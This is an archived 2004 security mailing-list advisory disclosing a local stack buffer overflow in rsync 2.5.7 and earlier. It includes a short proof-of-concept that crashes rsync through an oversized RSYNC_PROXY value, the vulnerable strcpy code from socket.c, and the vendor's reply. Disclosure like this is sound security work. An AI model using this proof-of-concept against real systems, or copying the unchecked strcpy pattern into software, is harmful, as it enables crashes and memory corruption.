OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
rsync <= 2.5.7 local buffer overflow (no root today:)

From: DownBload (downbloadhotmail.com)
Date: Mon Feb 09 2004 - 15:13:02 CST


Hi,

There is a local buffer overflow in rsync <= 2.5.7.
Problem is in open_socket_out function (socket.c).
Attacker can overflow portbuf[10] buffer on stack and overwrite saved return
address.
Rsync isn't suid so, no root shell today :-).

PoC example:
[rootlocalhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x
100,":","A" x 1000'`
[rootlocalhost rsync-2.5.7]# rsync localhost::
rsync: getaddrinfo:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA: ai_family not supported
Segmentation fault
[rootlocalhost rsync-2.5.7]#

- socket.c
...
        char portbuf[10];
        char *h;
        int proxied = 0;
        char buffer[1024];
        char *cp;

        h = getenv("RSYNC_PROXY");
        proxied = (h != NULL) && (*h != '\0');

        if (proxied) {
                strlcpy(buffer, h, sizeof(buffer));
                cp = strchr(buffer, ':');
                if (cp == NULL) {
                        rprintf(FERROR,
                                "invalid proxy specification: should be
HOST:PORT\n");
                        return -1;
                }
                *cp++ = '\0';
                strcpy(portbuf, cp); // <- OVERFLOW
...

Vendor response:
"Correct. I fixed this in the CVS version earlier this year. Since the proxy
data is coming from the local environment, I don't see a need to roll out an
update to 2.6.0 (which is the latest released version, BTW).
The fix will be in 2.6.1, which should be released in the next month or two."

DownBload / Illegal Instruction Labs
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com

"Born under the lucky star magical,
but on this earth generally tragical."